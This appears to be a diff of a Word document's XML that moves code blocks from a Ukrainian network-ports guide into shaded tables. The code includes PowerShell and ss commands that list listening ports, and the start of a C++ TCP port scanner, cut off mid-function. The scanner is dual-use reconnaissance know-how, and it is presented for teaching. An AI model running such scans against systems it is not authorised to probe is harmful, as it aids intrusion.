+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Windows: перевірка прослуховуваних портів</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object LocalPort, OwningProcess |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Sort-Object LocalPort</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Визначення процесів</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    ForEach-Object {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        [PSCustomObject]@{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Port = $_.LocalPort</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Process = $proc.Name</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Path = $proc.Path</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Linux</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Select-Object LocalPort, OwningProcess |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Sort-Object LocalPort</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Визначення процесів</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ForEach-Object {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        [PSCustomObject]@{</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            Port = $_.LocalPort</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            Process = $proc.Name</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            Path = $proc.Path</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Linux</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="22"/>
     <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
@@ -2516,830 +3011,948 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = int;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #define closesocket close</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">struct ServiceName {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int port;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return "Unknown";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool opened =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
